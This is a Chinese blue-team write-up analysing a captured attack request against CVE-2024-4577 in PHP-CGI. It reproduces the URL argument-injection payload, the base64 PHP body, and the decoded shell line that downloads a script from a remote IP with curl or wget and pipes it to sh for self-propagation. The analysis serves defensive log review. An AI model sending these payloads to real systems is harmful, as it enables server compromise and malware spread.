WEB安全--蓝队日志--RCE数据包分析

一、分析数据包内容

攻击者通过URL请求+POST传参的方式试图绕过IPS测试RCE漏洞的利用

URL请求中的内容进行urlcode解码后是这样的:

复制代码
http://资产IP/hello.world?-d allow_url_include=1 -d auto_prepend_file=php://input
1. -d allow_url_include=1
  • 使用 PHP 的 -d 命令行参数,在执行时动态设置配置项
  • allow_url_include=1:启用从 URL 包含文件的功能,这通常在 php.ini 是禁用的。
  • 它允许 include()require() 加载远程地址,如 http://attacker.com/shell.txt
2. -d auto_prepend_file=php://input
  • 这个设置使 PHP 在解析主脚本之前,自动包含一个文件
  • 这里指定的文件是 php://input,也就是HTTP 请求体(POST data)中的原始输入流
  • 也就是说可以直接包含POST中的数据并执行

然后再结合POST传递的内容分析:

请求体中的内容是:

复制代码
<?php shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzEwNC4yNDUuMjQwLjI4L3NoIHx8IHdnZXQgaHR0cDovL
zEwNC4yNDUuMjQwLjI4L3NoIC1PLSk7IGVjaG8gIiRYIiB8IHNoIC1zIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcA=="));
echo(md5("Hello CVE-2024-4577")); ?>

其中base64字段解码后:

复制代码
<?php shell_exec( X=$(curl http://104.245.240.28/sh || wget http://104.245.240.28/sh -O-); 
echo "$X" | sh -s cve_2024_4577.selfrep);

echo(md5("Hello CVE-2024-4577")); ?>

这条命令的目的是利用远程代码执行漏洞(RCE)来从远程服务器下载一个脚本并执行它,而它特别指向了一个命名为 cve_2024_4577.selfrep 的 payload,表明攻击者试图利用 2024 年披露的某个 CVE(CVE-2024-4577)漏洞,进行进一步的自动传播或感染操作

二、判断攻击者的目的

1、通过GET参数-d开启allow_url_include=1和auto_prepend_file=php://input

其目的是执行POST传递的数据流

2、POST注入恶意PHP脚本,内容为:

使用shell_exec()执行shell命令

复制代码
X=$(curl http://104.245.240.28/sh || wget http://104.245.240.28/sh -O-); echo "$X" | sh -s cve_2024_4577.selfrep

通过curl或wget访问攻击者远程搭建的服务器中104.245.240.28中的sh文件

把内容赋值给X

将X的值通过管道符传递给靶机本地sh执行

-s cve_2024_4577.selfrep 表明传递一个参数给脚本,脚本内部可能会根据这个参数执行

3、然后通过echo(md5("Hello CVE-2024-4577")); 输出一个hash,用于回显检测是否成功执行。

相关推荐
诗句藏于尽头1 小时前
完成ssl不安全警告
网络协议·安全·ssl
独行soc6 小时前
#渗透测试#批量漏洞挖掘#HSC Mailinspector 任意文件读取漏洞(CVE-2024-34470)
linux·科技·安全·网络安全·面试·渗透测试
Me4神秘7 小时前
Linux国产与国外进度对垒
linux·服务器·安全
老K(郭云开)7 小时前
谷歌浏览器安全输入控件-allWebSafeInput控件
安全
Whoisshutiao8 小时前
网安-XSS-pikachu
前端·安全·网络安全
还是奇怪9 小时前
Linux - 安全排查 2
linux·运维·安全
Clownseven14 小时前
云端备份与恢复策略:企业如何选择最安全的备份解决方案
安全
薄荷椰果抹茶17 小时前
【网络安全基础】第六章---Web安全需求
安全·web安全
HumanRisk1 天前
降低网络安全中的人为风险:以人为本的路径
网络·安全·web安全
运维开发王义杰1 天前
金融安全生命线:用AWS EventBridge和CloudTrail构建主动式入侵检测系统
安全·金融·aws